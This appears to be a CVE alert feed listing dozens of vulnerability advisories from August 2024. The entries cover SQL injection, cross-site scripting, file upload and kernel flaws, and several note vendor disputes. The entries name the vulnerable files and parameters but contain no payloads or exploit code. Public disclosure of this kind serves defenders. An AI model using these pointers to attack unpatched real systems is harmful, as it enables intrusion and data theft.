🚨 CVE-2024-33964SQL injection vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in it through the following 'id' in '/admin/mod_users/index.php' parameter.🎖@cveNotify |
|
| 2024-08-06 12:37:30 |
🚨 CVE-2024-33962SQL injection vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in it through the following 'code' in '/admin/mod_reservation/index.php' parameter.🎖@cveNotify |
|
| 2024-08-06 12:37:29 |
🚨 CVE-2024-33961SQL injection vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in it through the following 'code' in '/admin/mod_reservation/controller.php' parameter.🎖@cveNotify |
|
| 2024-08-06 12:37:26 |
🚨 CVE-2024-33960SQL injection vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in it through the following 'end' in '/admin/mod_reports/printreport.php' parameter.🎖@cveNotify |
|
| 2024-08-06 11:37:42 |
🚨 CVE-2024-7317The Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-08-06 11:37:41 |
🚨 CVE-2024-33980Cross-Site Scripting (XSS) vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain details of their session cookie via the 'start' parameter in '/admin/mod_reports/printreport.php'.🎖@cveNotify |
|
| 2024-08-06 11:37:40 |
🚨 CVE-2024-33979Cross-Site Scripting (XSS) vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain details of their session cookie via the 'q', 'arrival', 'departure' and 'accomodation' parameters in '/index.php'.🎖@cveNotify |
|
| 2024-08-06 11:37:37 |
🚨 CVE-2024-33978Cross-Site Scripting (XSS) vulnerability in E-Negosyo System affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain their session cookie details via 'category' parameter in '/index.php'.🎖@cveNotify |
|
| 2024-08-06 11:37:36 |
🚨 CVE-2024-33975Cross-Site Scripting (XSS) vulnerability in E-Negosyo System affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted JavaScript payload to an authenticated user and partially take over their browser session via 'view' parameter in '/admin/products/index.php'.🎖@cveNotify |
|
| 2024-08-06 11:37:35 |
🚨 CVE-2024-33959SQL injection vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in it through the following 'categ' in '/admin/mod_reports/printreport.php' parameter.🎖@cveNotify |
|
| 2024-08-06 11:37:32 |
🚨 CVE-2024-33958SQL injection vulnerability in E-Negosyo System affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in 'phonenumber' in '/passwordrecover.php' parameter.🎖@cveNotify |
|
| 2024-08-06 11:37:31 |
🚨 CVE-2024-6807A vulnerability was found in SourceCodester Student Study Center Desk Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /sscdms/classes/Users.php?f=save of the component HTTP POST Request Handler. The manipulation of the argument firstname/middlename/lastname/username leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-271706 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-06 11:37:30 |
🚨 CVE-2024-6732A vulnerability classified as critical was found in SourceCodester Student Study Center Desk Management System 1.0. This vulnerability affects unknown code of the file /sscdms/classes/Users.php?f=save. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-271450 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-06 11:37:26 |
🚨 CVE-2024-6731A vulnerability classified as critical has been found in SourceCodester Student Study Center Desk Management System 1.0. This affects an unknown part of the file /Master.php?f=save_student. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271449 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-06 11:37:25 |
🚨 CVE-2014-2913Incomplete blacklist vulnerability in nrpe.c in Nagios Remote Plugin Executor (NRPE) 2.15 and earlier allows remote attackers to execute arbitrary commands via a newline character in the -a option to libexec/check_nrpe. NOTE: this issue is disputed by multiple parties. It has been reported that the vendor allows newlines as "expected behavior." Also, this issue can only occur when the administrator enables the "dont_blame_nrpe" option in nrpe.conf despite the "HIGH security risk" warning within the comments🎖@cveNotify |
|
| 2024-08-06 11:37:24 |
🚨 CVE-2014-2734The openssl extension in Ruby 2.x does not properly maintain the state of process memory after a file is reopened, which allows remote attackers to spoof signatures within the context of a Ruby script that attempts signature verification after performing a certain sequence of filesystem operations. NOTE: this issue has been disputed by the Ruby OpenSSL team and third parties, who state that the original demonstration PoC contains errors and redundant or unnecessarily-complex code that does not appear to be related to a demonstration of the issue. As of 20140502, CVE is not aware of any public comment by the original researcher🎖@cveNotify |
|
| 2024-08-06 10:37:24 |
🚨 CVE-2014-1607Cross-site scripting (XSS) vulnerability in the EventCalendar module for Drupal 7.14 allows remote attackers to inject arbitrary web script or HTML via the year parameter to eventcalander/. NOTE: this issue has been disputed by the Drupal Security Team; it may be site-specific. If so, then this CVE will be REJECTed in the future🎖@cveNotify |
|
| 2024-08-06 09:37:31 |
🚨 CVE-2015-10087** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in UpThemes Theme DesignFolio Plus 1.2 on WordPress and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 53f6ae62878076f99718e5feb589928e83c879a9. It is recommended to apply a patch to fix this issue. The identifier VDB-221809 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-06 09:37:30 |
🚨 CVE-2015-10042** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical was found in Dovgalyuk AIBattle. Affected by this vulnerability is the function registerUser of the file site/procedures.php. The manipulation of the argument postLogin leads to sql injection. The identifier of the patch is 448e9880aac18ae7832f8d065e03e46ce0f1d3e3. It is recommended to apply a patch to fix this issue. The identifier VDB-218305 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-06 09:37:26 |
🚨 CVE-2015-10041** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical has been found in Dovgalyuk AIBattle. Affected is the function sendComments of the file site/procedures.php. The manipulation of the argument text leads to sql injection. The name of the patch is e3aa4d0900167641d41cbccf53909229f00381c9. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218304. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-06 09:37:25 |
🚨 CVE-2015-10007** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in 82Flex WEIPDCRM and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is 43bad79392332fa39e31b95268e76fbda9fec3a4. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217184. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-06 09:37:24 |
🚨 CVE-2015-8709kernel/ptrace.c in the Linux kernel through 4.4.1 mishandles uid and gid mappings, which allows local users to gain privileges by establishing a user namespace, waiting for a root process to enter that namespace with an unsafe uid or gid, and then using the ptrace system call. NOTE: the vendor states "there is no kernel bug here.🎖@cveNotify |
|
| 2024-08-06 07:37:25 |
🚨 CVE-2015-5215The default configuration of the Jinja templating engine used in the Identity Provider (IdP) server in Ipsilon 0.1.0 before 1.0.1 does not enable auto-escaping, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via template variables. NOTE: This may be a duplicate of CVE-2015-5216. Moreover, the Jinja development team does not enable auto-escape by default for performance issues as explained in https://jinja.palletsprojects.com/en/master/faq/#why-is-autoescaping-not-the-default.🎖@cveNotify |
|
| 2024-08-06 07:37:24 |
🚨 CVE-2015-5377Elasticsearch before 1.6.1 allows remote attackers to execute arbitrary code via unspecified vectors involving the transport protocol. NOTE: ZDI appears to claim that CVE-2015-3253 and CVE-2015-5377 are the same vulnerability🎖@cveNotify |
|
| 2024-08-06 06:37:32 |
🚨 CVE-2024-6202HaloITSM versions up to 2.146.1 are affected by a SAML XML Signature Wrapping (XSW) vulnerability. When having a SAML integration configured, anonymous actors could impersonate arbitrary HaloITSM users by just knowing their email address. HaloITSM versions past 2.146.1 (and patches starting from 2.143.61 ) fix the mentioned vulnerability.🎖@cveNotify |
|
| 2024-08-06 06:37:26 |
🚨 CVE-2024-6201HaloITSM versions up to 2.146.1 are affected by a Template Injection vulnerability within the engine used to generate emails. This can lead to the leakage of potentially sensitive information. HaloITSM versions past 2.146.1 (and patches starting from 2.143.61 ) fix the mentioned vulnerability.🎖@cveNotify |
|
| 2024-08-06 06:37:25 |
🚨 CVE-2024-5708The WPBakery Visual Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘link’ parameter in all versions up to, and including, 7.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, and with post permissions granted by an Administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-06 06:37:24 |
🚨 CVE-2015-2877Kernel Samepage Merging (KSM) in the Linux kernel 2.6.32 through 4.x does not prevent use of a write-timing side channel, which allows guest OS users to defeat the ASLR protection mechanism on other guest OS instances via a Cross-VM ASL INtrospection (CAIN) attack. NOTE: the vendor states "Basically if you care about this attack vector, disable deduplication." Share-until-written approaches for memory conservation among mutually untrusting tenants are inherently detectable for information disclosure, and can be classified as potentially misunderstood behaviors rather than vulnerabilities🎖@cveNotify |
|
| 2024-08-06 05:37:25 |
🚨 CVE-2024-5913An improper input validation vulnerability in Palo Alto Networks PAN-OS software enables an attacker with the ability to tamper with the physical file system to elevate privileges.🎖@cveNotify |
|
| 2024-08-06 05:37:24 |
🚨 CVE-2015-1571The CAPWAP DTLS protocol implementation in Fortinet FortiOS 5.0 Patch 7 build 4457 uses the same certificate and private key across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the Fortinet_Factory certificate and private key. NOTE: FG-IR-15-002 says "The Fortinet_Factory certificate is unique to each device ... An attacker cannot therefore stage a MitM attack.🎖@cveNotify |
|
| 2024-08-06 04:37:31 |
🚨 CVE-2016-15036** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Deis Workflow Manager up to 2.3.2. It has been classified as problematic. This affects an unknown part. The manipulation leads to race condition. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.3 is able to address this issue. The patch is named 31fe3bccbdde134a185752e53380330d16053f7f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248847. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-06 04:37:30 |
🚨 CVE-2016-15032** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic has been found in mback2k mh_httpbl Extension up to 1.1.7 on TYPO3. This affects the function stopOutput of the file class.tx_mhhttpbl.php. The manipulation of the argument $_SERVER['REMOTE_ADDR'] leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.1.8 is able to address this issue. The patch is named a754bf306a433a8c18b55e25595593e8f19b9463. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230391. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-06 04:37:26 |
🚨 CVE-2016-15010** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic was found in University of Cambridge django-ucamlookup up to 1.9.1. Affected by this vulnerability is an unknown functionality of the component Lookup Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.9.2 is able to address this issue. The identifier of the patch is 5e25e4765637ea4b9e0bf5fcd5e9a922abee7eb3. It is recommended to upgrade the affected component. The identifier VDB-217441 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-06 04:37:25 |
🚨 CVE-2016-20009A DNS client stack-based buffer overflow in ipdnsc_decode_name() affects Wind River VxWorks 6.5 through 7. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-06 04:37:24 |
🚨 CVE-2016-10723An issue was discovered in the Linux kernel through 4.17.2. Since the page allocator does not yield CPU resources to the owner of the oom_lock mutex, a local unprivileged user can trivially lock up the system forever by wasting CPU resources from the page allocator (e.g., via concurrent page fault events) when the global OOM killer is invoked. NOTE: the software maintainer has not accepted certain proposed patches, in part because of a viewpoint that "the underlying problem is non-trivial to handle.🎖@cveNotify |
|
| 2024-08-06 03:37:30 |
🚨 CVE-2024-7499A vulnerability was found in itsourcecode Airline Reservation System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file flights.php. The manipulation of the argument departure_airport_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273625 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-06 03:37:29 |
🚨 CVE-2024-7498A vulnerability was found in itsourcecode Airline Reservation System 1.0. It has been classified as critical. Affected is the function login/login2 of the file /admin/login.php of the component Admin Login Page. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273624.🎖@cveNotify |
|
| 2024-08-06 03:37:26 |
🚨 CVE-2024-5963Unquoted Executable Path vulnerability in Hitachi Device Manager on Windows (Device Manager Server component).This issue affects Hitachi Device Manager: before 8.8.7-00.🎖@cveNotify |
|
| 2024-08-06 03:37:25 |
🚨 CVE-2016-10031WampServer 3.0.6 installs two services called 'wampapache' and 'wampmysqld' with weak file permissions, running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. To properly exploit this vulnerability, the local attacker must insert an executable file called mysqld.exe or httpd.exe and replace the original files. The next time the service starts, the malicious file will get executed as SYSTEM. NOTE: the vendor disputes the relevance of this report, taking the position that a configuration in which "'someone' (an attacker) is able to replace files on a PC" is not "the fault of WampServer.🎖@cveNotify |
|
| 2024-08-06 03:37:24 |
🚨 CVE-2016-8858The kex_input_kexinit function in kex.c in OpenSSH 6.x and 7.x through 7.3 allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate KEXINIT requests. NOTE: a third party reports that "OpenSSH upstream does not consider this as a security issue."🎖@cveNotify |
|
| 2024-08-06 02:37:31 |
🚨 CVE-2024-7497A vulnerability was found in itsourcecode Airline Reservation System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/index.php. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273623.🎖@cveNotify |
|
| 2024-08-06 02:37:30 |
🚨 CVE-2024-7484The CRM Perks Forms plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'handle_uploaded_files' function in versions up to, and including, 1.1.3. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-08-06 02:37:29 |
🚨 CVE-2024-6315The Blox Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'handleUploadFile' function in all versions up to, and including, 1.0.65. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-08-06 02:37:26 |
🚨 CVE-2023-5000The Horizontal scrolling announcements plugin for WordPress is vulnerable to SQL Injection via the plugin's 'hsas-shortcode' shortcode in versions up to, and including, 2.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-08-06 02:37:25 |
🚨 CVE-2016-7919Moodle 3.1.2 allows remote attackers to obtain sensitive information via unspecified vectors, related to a "SQL Injection" issue affecting the Administration panel function in the installation process component. NOTE: the vendor disputes the relevance of this report, noting that "the person who is installing Moodle must know database access credentials and they can access the database directly; there is no need for them to create a SQL injection in one of the installation dialogue fields.🎖@cveNotify |
|
| 2024-08-06 02:37:24 |
🚨 CVE-2016-6531Open Dental 16.1 and earlier has a hardcoded MySQL root password, which allows remote attackers to obtain administrative access by leveraging access to intranet TCP port 3306. NOTE: the vendor disputes this issue, stating that the "vulnerability note ... is factually false ... there is indeed a default blank password, but it can be changed ... We recommend that users change it, each customer receives direction.🎖@cveNotify |
|
| 2024-08-06 01:37:25 |
🚨 CVE-2021-38578Existing CommBuffer checks in SmmEntryPoint will not catch underflow when computing BufferSize.🎖@cveNotify |
|
| 2024-08-06 01:37:24 |
🚨 CVE-2016-4070Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allows remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function. NOTE: the vendor says "Not sure if this qualifies as security issue (probably not).🎖@cveNotify |
|
| 2024-08-06 01:07:24 |
🚨 CVE-2018-0824A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects, aka "Microsoft COM for Windows Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.🎖@cveNotify |
|
| 2024-08-06 00:37:32 |
🚨 CVE-2024-7541oFono AT CMT Command Uninitialized Variable Information Disclosure Vulnerability. This vulnerability allows local attackers to disclose sensitive information on affected installations of oFono. An attacker must first obtain the ability to execute code on the target modem in order to exploit this vulnerability.The specific flaw exists within the parsing of responses from AT+CMT commands. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-23308.🎖@cveNotify |
|
| 2024-08-06 00:37:26 |
🚨 CVE-2024-7540oFono AT CMGL Command Uninitialized Variable Information Disclosure Vulnerability. This vulnerability allows local attackers to disclose sensitive information on affected installations of oFono. An attacker must first obtain the ability to execute code on the target modem in order to exploit this vulnerability.The specific flaw exists within the parsing of responses from AT+CMGL commands. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-23307.🎖@cveNotify |
|
| 2024-08-06 00:37:25 |
🚨 CVE-2024-7537oFono QMI SMS Handling Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows local attackers to disclose sensitive information on affected installations of oFono. Authentication is not required to exploit this vulnerability.The specific flaw exists within the processing of SMS message lists. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-23157.🎖@cveNotify |
|
| 2024-08-06 00:37:24 |
🚨 CVE-2016-2427The AES-GCM specification in RFC 5084, as used in Android 5.x and 6.x, recommends 12 octets for the aes-ICVlen parameter field, which might make it easier for attackers to defeat a cryptographic protection mechanism and discover an authentication key via a crafted application, aka internal bug 26234568. NOTE: The vendor disputes the existence of this potential issue in Android, stating "This CVE was raised in error: it referred to the authentication tag size in GCM, whose default according to ASN.1 encoding (12 bytes) can lead to vulnerabilities. After careful consideration, it was decided that the insecure default value of 12 bytes was a default only for the encoding and not default anywhere else in Android, and hence no vulnerability existed.🎖@cveNotify |
|
| 2024-08-05 23:37:24 |
🚨 CVE-2024-7494A vulnerability, which was classified as critical, has been found in SourceCodester Clinics Patient Management System 1.0. Affected by this issue is some unknown functionality of the file /new_prescription.php. The manipulation of the argument patient leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273620.🎖@cveNotify |
|
| 2024-08-05 22:37:41 |
🚨 CVE-2024-25736An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot GET request.🎖@cveNotify |
|
| 2024-08-05 22:37:37 |
🚨 CVE-2017-20187** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Magnesium-PHP up to 0.3.0. It has been classified as problematic. Affected is the function formatEmailString of the file src/Magnesium/Message/Base.php. The manipulation of the argument email/name leads to injection. Upgrading to version 0.3.1 is able to address this issue. The patch is identified as 500d340e1f6421007413cc08a8383475221c2604. It is recommended to upgrade the affected component. VDB-244482 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-05 22:37:36 |
🚨 CVE-2017-20178** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Codiad 2.8.0. It has been rated as problematic. Affected by this issue is the function saveJSON of the file components/install/process.php. The manipulation of the argument data leads to information disclosure. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. Upgrading to version 2.8.1 is able to address this issue. The patch is identified as 517119de673e62547ee472a730be0604f44342b5. It is recommended to upgrade the affected component. VDB-221498 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-05 22:37:31 |
🚨 CVE-2017-20015A vulnerability, which was classified as problematic, was found in WEKA INTEREST Security Scanner up to 1.8. This affects an unknown part of the component LAN Viewer. The manipulation with an unknown input leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-05 22:37:30 |
🚨 CVE-2017-20013A vulnerability classified as problematic was found in WEKA INTEREST Security Scanner up to 1.8. Affected by this vulnerability is the Stresstest Configuration Handler. A manipulation leads to a local denial of service. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-05 22:37:26 |
🚨 CVE-2017-20011A vulnerability was found in WEKA INTEREST Security Scanner 1.8. It has been rated as problematic. This issue affects some unknown processing of the component HTTP Handler. The manipulation with an unknown input leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-05 22:37:25 |
🚨 CVE-2017-18343The debug handler in Symfony before v2.7.33, 2.8.x before v2.8.26, 3.x before v3.2.13, and 3.3.x before v3.3.6 has XSS via an array key during exception pretty printing in ExceptionHandler.php, as demonstrated by a /_debugbar/open?op=get URI. NOTE: the vendor's position is that this is not a vulnerability because the debug tools are not intended for production use. NOTE: the Symfony Debug component is used by Laravel Debugbar🎖@cveNotify |
|
| 2024-08-05 22:37:24 |
🚨 CVE-2017-18207The Wave_read._read_fmt_chunk function in Lib/wave.py in Python through 3.6.4 does not ensure a nonzero channel value, which allows attackers to cause a denial of service (divide-by-zero and exception) via a crafted wav format audio file. NOTE: the vendor disputes this issue because Python applications "need to be prepared to handle a wide variety of exceptions.🎖@cveNotify |
|
| 2024-08-05 21:37:43 |
🚨 CVE-2017-17919SQL injection vulnerability in the 'order' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id desc' parameter. NOTE: The vendor disputes this issue because the documentation states that this method is not intended for use with untrusted input🎖@cveNotify |
|
| 2024-08-05 21:37:37 |
🚨 CVE-2017-17917SQL injection vulnerability in the 'where' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id' parameter. NOTE: The vendor disputes this issue because the documentation states that this method is not intended for use with untrusted input🎖@cveNotify |
|
| 2024-08-05 21:37:36 |
🚨 CVE-2017-17530common/help.c in Geomview 1.9.5 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: this is disputed by a third party because no untrusted input can be used for the injection🎖@cveNotify |
|
| 2024-08-05 21:37:35 |
🚨 CVE-2017-17527delphi_gui/WWWBrowserRunnerDM.pas in PasDoc 0.14 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a software maintainer has indicated that the code referencing the BROWSER environment variable is never used🎖@cveNotify |
|
| 2024-08-05 21:37:31 |
🚨 CVE-2017-17518swt/motif/browser.c in White_dune (aka whitedune) 0.30.10 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: This issue is being disputed as not being a vulnerability because “the current version of white_dune (1.369 at https://wdune.ourproject.org/) do not use a "BROWSER environment variable". Instead, the "browser" variable is read from the $HOME/.dunerc file (or from the M$Windows registry). It is configurable in the "options" menu. The default is chosen in the ./configure script, which tests various programs, first tested is "xdg-open".🎖@cveNotify |
|
| 2024-08-05 21:37:30 |
🚨 CVE-2017-17514boxes.c in nip2 8.4.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a software maintainer indicates that this product does not use the BROWSER environment variable🎖@cveNotify |
|
| 2024-08-05 21:37:26 |
🚨 CVE-2017-17058The WooCommerce plugin through 3.x for WordPress has a Directory Traversal Vulnerability via a /wp-content/plugins/woocommerce/templates/emails/plain/ URI, which accesses a parent directory. NOTE: a software maintainer indicates that Directory Traversal is not possible because all of the template files have "if (!defined('ABSPATH')) {exit;}" code🎖@cveNotify |
|
| 2024-08-05 21:37:25 |
🚨 CVE-2017-16870The UpdraftPlus plugin through 1.13.12 for WordPress has SSRF in the updraft_ajax_handler function in /wp-content/plugins/updraftplus/admin.php via an httpget subaction. NOTE: the vendor reports that this does not cross a privilege boundary🎖@cveNotify |
|
| 2024-08-05 21:37:24 |
🚨 CVE-2017-16869p_mach.cpp in UPX 3.94 allows remote attackers to cause a denial of service (invalid memory access and application crash) or possibly have unspecified other impact via a crafted Mach-O file, related to canPack and unpack functions. NOTE: the vendor has stated "there is no security implication whatsoever.🎖@cveNotify |
|
| 2024-08-05 21:07:26 |
🚨 CVE-2024-41691This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to storing of FTP credentials in plaintext within the SquashFS-root filesystem associated with the router's firmware. An attacker with physical access could exploit this by extracting the firmware and reverse engineer the binary data to access the plaintext FTP credentials from the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to gain unauthorized access to the FTP server associated with the targeted system.🎖@cveNotify |
|
| 2024-08-05 21:07:25 |
🚨 CVE-2024-41688This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due lack of encryption in storing of usernames and passwords within the router's firmware/ database. An attacker with physical access could exploit this by extracting the firmware and reverse engineer the binary data to access the plaintext credentials on the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to gain unauthorized access to the targeted system.🎖@cveNotify |
|
| 2024-08-05 21:07:24 |
🚨 CVE-2024-41687This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to transmission of password in plain text. A remote attacker could exploit this vulnerability by intercepting transmission within an HTTP session on the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to gain unauthorized access to the targeted system.🎖@cveNotify |
|
| 2024-08-05 20:37:32 |
🚨 CVE-2017-14523WonderCMS 2.3.1 is vulnerable to an HTTP Host header injection attack. It uses user-entered values to redirect pages. NOTE: the vendor reports that exploitation is unlikely because the attack can only come from a local machine or from the administrator as a self attack🎖@cveNotify |
|
| 2024-08-05 20:37:26 |
🚨 CVE-2017-14522In WonderCMS 2.3.1, the application's input fields accept arbitrary user input resulting in execution of malicious JavaScript. NOTE: the vendor disputes this issue stating that this is a feature that enables only a logged in administrator to write execute JavaScript anywhere on their website🎖@cveNotify |
|
| 2024-08-05 20:37:25 |
🚨 CVE-2017-15567The certificate import component in IDEMIA (formerly Morpho) MorphoSmart 1300 Series (aka MSO 1300 Series) devices allows local users to obtain a command shell, and consequently gain privileges, via unspecified vectors. NOTE: the vendor disputes this because there is no command shell in the product or in the associated SDK🎖@cveNotify |
|
| 2024-08-05 20:37:24 |
🚨 CVE-2017-14988Header::readfrom in IlmImf/ImfHeader.cpp in OpenEXR 2.2.0 allows remote attackers to cause a denial of service (excessive memory allocation) via a crafted file that is accessed with the ImfOpenInputFile function in IlmImf/ImfCRgbaFile.cpp. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid🎖@cveNotify |
|
| 2024-08-05 18:37:32 |
🚨 CVE-2017-9855An issue was discovered in SMA Solar Technology products. A secondary authentication system is available for Installers called the Grid Guard system. This system uses predictable codes, and a single Grid Guard code can be used on any SMA inverter. Any such code, when combined with the installer account, allows changing very sensitive parameters. NOTE: the vendor reports that Grid Guard is not an authentication feature; it is only a tracing feature. Also, only Sunny Boy TLST-21 and TL-21 and Sunny Tripower TL-10 and TL-30 could potentially be affected🎖@cveNotify |
|
| 2024-08-05 18:37:26 |
